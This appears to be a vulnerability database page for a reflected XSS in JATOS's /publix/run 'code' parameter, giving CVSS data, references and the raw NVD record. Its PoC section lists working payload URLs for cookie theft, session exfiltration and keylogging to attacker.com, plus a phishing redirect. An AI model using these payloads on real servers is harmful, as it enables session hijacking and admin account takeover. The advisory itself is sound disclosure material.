CVE-2025-56313

Description

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /publix/run endpoint of JATOS 3.7.1 through 3.9.6 (inclusive). This allows remote attackers to execute arbitrary JavaScript in a user's web browser by including a malicious payload in the "code" URL parameter. When an authenticated admin user accesses the study's URL, the malicious script gets interpreted and executes within their browser, which can lead to unauthorized actions, account compromise, and privilege escalation.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JATOS >= 3.7.1 且 <= 3.9.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-56313 PoC - JATOS Reflected XSS -->
<!-- Target: JATOS 3.7.1 - 3.9.6 -->
<!-- Endpoint: /publix/run -->
<!-- Parameter: code -->

<!-- Basic XSS PoC -->
https://target-jatos-server/publix/run?code=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
https://target-jatos-server/publix/run?code=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Session Hijacking PoC -->
https://target-jatos-server/publix/run?code=<img src=x onerror="fetch('https://attacker.com/log?cookie='+btoa(document.cookie))">

<!-- Keylogger PoC -->
https://target-jatos-server/publix/run?code=<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script>

<!-- Phishing Redirect PoC -->
https://target-jatos-server/publix/run?code=<script>window.location='https://attacker.com/phishing'</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56313
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56313
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56313/
[4] VulDB https://vuldb.com/cve/CVE-2025-56313
[5] https://github.com/JATOS/JATOS
[6] https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0
[7] https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56313", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:32.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /publix/run endpoint of JATOS 3.7.1 through 3.9.6 (inclusive). This allows remote attackers to execute arbitrary JavaScript in a user's web browser by including a malicious payload in the \"code\" URL parameter. When an authenticated admin user accesses the study's URL, the malicious script gets interpreted and executes within their browser, which can lead to unauthorized actions, account compromise, and privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/JATOS/JATOS", "source": "[email protected]"}, {"url": "https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0", "source": "[email protected]"}, {"url": "https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}